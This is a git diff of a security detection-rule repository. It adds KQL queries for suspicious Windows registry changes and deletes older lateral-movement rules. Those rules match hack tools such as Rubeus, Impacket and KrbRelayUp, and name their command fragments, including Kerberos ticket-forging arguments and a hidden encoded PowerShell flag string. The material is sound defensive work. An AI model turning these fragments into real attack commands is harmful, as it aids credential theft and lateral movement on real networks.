+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+//   - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql
new file mode 100644
index 00000000..acf268fa
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql
@@ -0,0 +1,12 @@
+// Title: Winget Admin Settings Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: low
+// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+//   - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql
new file mode 100644
index 00000000..546b5770
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql
@@ -0,0 +1,14 @@
+// Title: Winlogon AllowMultipleTSSessions Enable
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
+// Which allows for multiple Remote Desktop connection sessions to be opened at once.
+// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate use of the multi session functionality
+
+DeviceRegistryEvents
+| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql
new file mode 100644
index 00000000..d57db568
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql
@@ -0,0 +1,11 @@
+// Title: Winlogon Notify Key Logon Persistence
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
+// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql
new file mode 100644
index 00000000..6148dd5c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: WinSock2 Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..45ea6561
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Wow6432Node Classes Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql
new file mode 100644
index 00000000..fc54df88
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Wow6432Node CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or isnull(RegistryValueData) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
new file mode 100644
index 00000000..6472a03f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql b/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql
deleted file mode 100644
index d07c94db..00000000
--- a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Rubeus_Execution.kql b/Lateral Movement/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Lateral Movement/HackTool_-_Rubeus_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql b/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql
deleted file mode 100644
index 2c391cb7..00000000
--- a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Luca Di Bartolomeo (CrimpSec)
-// Date: 2024/01/29
-// Level: high
-// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
-
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql b/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql
deleted file mode 100644
index 7a831987..00000000
--- a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-// Tags: attack.lateral_movement, attack.t1021.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Lateral Movement/MMC_Spawning_Windows_Shell.kql b/Lateral Movement/MMC_Spawning_Windows_Shell.kql
deleted file mode 100644
index e74f2325..00000000
--- a/Lateral Movement/MMC_Spawning_Windows_Shell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Swisscom CSIRT
-// Date: 2019/08/05
-// Level: high
-// Description: Detects a Windows command line executable started from MMC
-// Tags: attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql b/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql
deleted file mode 100644
index 9d8271d6..00000000
--- a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
-// Tags: attack.lateral_movement
-DeviceProcessEvents
-| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql b/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql b/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql
deleted file mode 100644
index 24c6c93b..00000000
--- a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
-Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-
-// Tags: attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /v:" and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql b/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql
deleted file mode 100644
index bec2a777..00000000
--- a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/05/15
-// Level: high
-// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
-An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
-
-// Tags: attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ "<unknown process>")))
\ No newline at end of file
